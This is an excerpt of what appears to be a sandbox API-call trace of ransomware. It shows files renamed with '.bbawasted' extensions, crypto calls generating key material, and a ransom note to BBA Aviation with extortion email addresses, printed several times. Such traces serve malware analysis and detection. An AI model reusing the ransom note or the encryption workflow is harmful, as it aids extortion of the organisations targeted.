KEY:\r\n[begin_key]IOW90Kb7WC4x0c1TMPq3KpFubkZywrcs2GucEeLZy0EWbXgmyeTA+JdWkAuUPyFp\r\nfC5HMb2+eDkHAtpXGFqP76t4wzL3leqGSx743KYMYtPD3353IbjEtpfXy8/tRCI5\r\ngEHTpUX9Y1/ynqA+9hRwtCFc9h92c0peCIreRRAwnnMmUXeduCl/C1qiMg6rg6D1\r\naKjlbZgSAYh25fdKBc3Ny1aakv2J4hRGEWUywc1Ok+MJlgmyP5PlgeXDnYE6Zorn\r\nwvHWo7eEqUwUSsQAIgctxlp9or6aJAYm7rBStmQgLlAx8ODkNfPWXrRZfOPaJEPL\r\nEw/Edyh05e74+kXURxZVXFfPJP2+WKrtrQP3Pl7ThSpaR2Bb5kV2k00PYNp9RNwQ\r\n43saQzlirbQe3MakN4XcVR0Iq54nSrmAtpHs1MsmZJYuX60sCkJF4cJTdP9g43i5\r\n+hfLAssjIs0i9BBI1qKV6tBJpvIxQZHFtHsiuKyQXr3M65rEZMelgvtoaJm5DgvH\r\njoF7OMUCRxO6mAyCFn1M3S8u1VywroymdzBcQJib8VuelD3YifhlG7uxs3oOrZOC\r\nK5d68J1TLbMuyWLWQ/lxZoiCzIOEab21bByt8z0Cp7MN0rJOJOvQ89/TA6JDb9oV\r\nCgucVx+jgYqurSOAJkVjOE6AVAGyXNZxYa8RoVgwDIE=[end_key]\r\nKEEP IT\r\n") returned 984 [0178.293] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0178.293] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0178.293] SetEndOfFile (hFile=0x28c) returned 1 [0178.432] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0178.432] CloseHandle (hObject=0x28c) returned 1 [0178.435] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0178.435] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a48d8 | out: hHeap=0x660000) returned 1 [0178.435] _aulldvrm () returned 0x0 [0178.435] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6570) returned 1 [0178.436] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0178.436] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0178.436] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.xsd") returned 37 [0178.436] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x254) returned 0x6aecf0 [0178.436] lstrcpyW (in: lpString1=0x6aed3a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0178.436] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0178.436] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6350) returned 1 [0178.437] CryptGenRandom (in: hProv=0x6a6350, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0178.437] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0178.437] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.xsd.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0178.437] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0178.438] SetEndOfFile (hFile=0x28c) returned 1 [0178.438] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0178.438] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0178.438] lstrcpyW (in: lpString1=0x6aed3a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0178.438] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.xsd" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.xsd.bbawasted" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd.bbawasted")) returned 1 [0178.439] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SetupUi.xsd.bbawasted" (normalized: "c:\\588bce7c90097ed212\\setupui.xsd.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0178.439] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0178.439] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x75a8 [0178.440] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x75a8) returned 0x640000 [0178.440] CloseHandle (hObject=0x280) returned 1 [0178.445] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0178.446] CloseHandle (hObject=0x294) returned 1 [0178.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0178.446] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a68a0) returned 1 [0178.446] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0178.447] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0178.447] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a5f98) returned 1 [0178.447] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0178.447] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0178.458] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0178.458] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0178.458] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0178.458] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]NAwQWILi/UvCVMccOZJHNCrgxgcMVlC+4ToWTy0FvykxQrvIHcpFn6zPWY1TSKpQ\r\n7Ipp6CnfZ+PjBuQHxf5aOvbcVj2ifCNhI5NqkZXWCSA04h7H8S1R2oj3Da+gViwF\r\nbuzYO0GnqLiA5YiNFGFJ/gIKTE0xcXhPlvz6wCQ+/B5Fa8lr/UjNFhgYscfLNC/H\r\nxFphJKDGjqH5Z4PApHG2yeF5CXQ159lCE2MFEosGzvQfay5ZpeVlvsCJjzoiXe82\r\nIEBTOsKUd7C98a8wYBk040lcVvuuasmxXD751PJlpKgGj33ovmU71U2cyPE3FZ/z\r\nuiX8+39qDNCfNO6h7NFPLPHei7aetUpPulNcwJy3cxrLcOXtSOARWJeq368gCj2C\r\nw35fe/927aZJlyOVYJBp+GdTKEJYW5bqqnd1k5fldGeS9mXoj0xUUJgb9znzf4R+\r\n8pfYJ3NUIsJcOHLrnslFGos41sw7WhqRqZcyGJ1hd2z8E57vLArhNC8dgBf+BTfQ\r\nXK5L6QfzprN6ZEez0RCx5Hs/SGJo4mTo6XeW0y/HvQChYlk5U7ly0iurU5nWeAff\r\n6qZLoiuJcz6u54u2G8ZQs463DXXT0QY89o/jdb4y+5CyxdwO2QL+ANmr9CkcgZbD\r\nIFiGWHPokmnY1P0X96fvhF/oRg3WkOvqYchXoOJX0y5=[end_key]\r\nKEEP IT\r\n") returned 984 [0178.458] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0178.458] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0178.459] SetEndOfFile (hFile=0x28c) returned 1 [0178.461] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0178.461] CloseHandle (hObject=0x28c) returned 1 [0178.468] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0178.468] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a2b28 | out: hHeap=0x660000) returned 1 [0178.468] _aulldvrm () returned 0x0 [0178.468] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6020) returned 1 [0178.469] CryptGenRandom (in: hProv=0x6a6020, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0178.469] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0178.469] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\SplashScreen.bmp") returned 42 [0178.469] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x25e) returned 0x6aecf0 [0178.469] lstrcpyW (in: lpString1=0x6aed44, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0178.469] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0178.470] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6240) returned 1 [0178.470] CryptGenRandom (in: hProv=0x6a6240, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0178.470] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0178.470] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SplashScreen.bmp.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0178.471] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0178.472] SetEndOfFile (hFile=0x28c) returned 1 [0178.473] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0178.473] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0178.473] lstrcpyW (in: lpString1=0x6aed44, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0178.473] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\SplashScreen.bmp" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\SplashScreen.bmp.bbawasted" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp.bbawasted")) returned 1 [0178.474] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\SplashScreen.bmp.bbawasted" (normalized: "c:\\588bce7c90097ed212\\splashscreen.bmp.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0178.474] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0178.474] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xa078 [0178.474] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa078) returned 0x640000 [0178.474] CloseHandle (hObject=0x294) returned 1 [0178.801] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0178.802] CloseHandle (hObject=0x280) returned 1 [0178.802] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0178.802] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6240) returned 1 [0178.803] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0178.803] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0178.803] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6570) returned 1 [0178.804] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0178.804] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0178.814] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0178.814] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0178.814] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0178.815] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]IaxhDn9pORkkBjHjiYtjbAl0K5MLv0KyxlWHrcbWPlFCbUHl3gM8h9uBDKt1dCoS\r\nvnTiB1A0tk9Kj8VFPQaSeWbhnXv9pV5jUhrT38W1uTlZ2YKqeFBeondu+KfOg46k\r\n7miA1BGkagpMq7i8h9M49VrbLsprsGx09UgMrNN9PoeZLG9Er8av5RchnWCCSf3z\r\n3SbsYS4JrznGeTJz02koIiMLQjO00mS/G0SYL4m87bLVNm8I80E+Jgj6EzIi98Tc\r\n75ACx/svTZQuP3bA5g9VmpKSKDThZawWX6Jfj57a4z64EIneT8+b6a8n6A7wXBrT\r\nJOeftK+aq+dIzPyNgHdBmek+7FOpZoeWUayfC1R1QnkDkL6LbDwCYKa3+RGA6wwZ\r\nPuwRmz4HFeYciFMsEWsaq9vyoYv9Id9b5sKImmVaiyMyx3Vtw++FtrXZzDJ9lIjl\r\nDodEdGIFgzrdPZt/FCuhVOeL1WCBLcjRa/axISap9H8Saw56NdCAE0kvPvEBgHji\r\nbwdwqqst4WumtCV51J6CBB14IPspVsu0pZfx43wAZdzo+hz5BK8rUiYsmfLUrVu1\r\nfY0aUH5xaZsPHkdg+FS5GExUmFNK5Zw70XiJ/ZMH7+6iWQfxbFC9McmRO5+GUBlH\r\nGbVZr+hMyI1NP+XaH6YRhQlx4hiICwzWT/c3ViGG4SK=[end_key]\r\nKEEP IT\r\n") returned 984 [0178.815] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0178.815] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0178.815] SetEndOfFile (hFile=0x28c) returned 1 [0178.818] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0178.818] CloseHandle (hObject=0x28c) returned 1 [0178.820] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0178.820] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a4358 | out: hHeap=0x660000) returned 1 [0178.820] _aulldvrm () returned 0x0 [0178.820] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6350) returned 1 [0178.821] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0178.821] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0178.821] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\Strings.xml") returned 37 [0178.821] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x254) returned 0x6aecf0 [0178.821] lstrcpyW (in: lpString1=0x6aed3a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0178.821] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0178.821] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6818) returned 1 [0178.822] CryptGenRandom (in: hProv=0x6a6818, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0178.822] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0178.822] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Strings.xml.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\strings.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0178.823] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0178.824] SetEndOfFile (hFile=0x28c) returned 1 [0178.824] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0178.824] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0178.824] lstrcpyW (in: lpString1=0x6aed3a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0178.824] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Strings.xml" (normalized: "c:\\588bce7c90097ed212\\strings.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Strings.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\strings.xml.bbawasted")) returned 1 [0178.825] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Strings.xml.bbawasted" (normalized: "c:\\588bce7c90097ed212\\strings.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0178.825] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0178.826] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x3704 [0178.826] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3704) returned 0x640000 [0178.826] CloseHandle (hObject=0x280) returned 1 [0178.912] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0178.929] CloseHandle (hObject=0x294) returned 1 [0178.929] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0178.929] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a5f98) returned 1 [0178.930] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0178.930] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0178.930] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6020) returned 1 [0178.931] CryptGenRandom (in: hProv=0x6a6020, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0178.931] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0178.941] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0178.942] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0178.942] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0178.942] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]bo0QT0GxL8qV65DxvjNZjaL8laNLeXTs3xvOoS3wlqAERNxz6x+dANg1Etmi+rzz\r\n1GsO72uTSmYzpTxeoAC3pSd70k+S2l8mdstUKEgDY5dEgOMV6+OtiwjFzBco7Nxe\r\nDMQylhu/hLxLO6Trwgh6++wPRYlPB0awqdhcIU9D6QY2ZUoU2VqzeeS3Yj6cc57K\r\nLoSnej7c2dDRcUm7t9LezmN8Ghkq5wyj+IfsvdxIiLGSUObb6m5fqG4fPn20+nB7\r\n9qU4JRlt9VUKJiOVw4QkTncv9Pf96Yt7oagzo2/CrBy3a7stZFZTaEzhytWlR33l\r\n8Q7SMvuveVR6ZiHn2WNqL6/ysE7333Ycdzrt7XRo9KWPL+zFmDrsYKID5mVv5KT9\r\nOWA+oKMDbe8vrJUYFvfjn8zdnY9pcDuyA9Ow4mDg9tBJVKwNSIj6gfErZ2bCp5PD\r\nFgy6RN2LtdlnjJyaLwVIsWok4yQpibRlRGLbLVcHMMiFK9+Upm3dsy2cSxfLhtHe\r\noR+irEN3pc078iveQ9w0V6GmQOe8XAaPgpap0k3kOu/l1iQX95Ore/Jn4liLoe/h\r\njxYPDzKQR0VyUb6i3xIM6WMMaRBW/CS8tmC9PN/IuwyDTu6BkDJiHkWSYb4JU2jN\r\n9lnulYRj6kePkF5Gjiub83349VXJjYppBvNmC/a2Dam=[end_key]\r\nKEEP IT\r\n") returned 984 [0178.942] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0178.942] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0178.942] SetEndOfFile (hFile=0x28c) returned 1 [0178.945] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0178.945] CloseHandle (hObject=0x28c) returned 1 [0178.947] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0178.947] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a35a8 | out: hHeap=0x660000) returned 1 [0178.947] _aulldvrm () returned 0x0 [0178.948] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6240) returned 1 [0178.948] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0178.948] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0178.948] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\UiInfo.xml") returned 36 [0178.948] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x252) returned 0x6aecf0 [0178.949] lstrcpyW (in: lpString1=0x6aed38, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0178.949] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0178.949] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6130) returned 1 [0178.949] CryptGenRandom (in: hProv=0x6a6130, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0178.949] CryptReleaseContext (hProv=0x6a6130, dwFlags=0x0) returned 1 [0178.949] CreateFileW 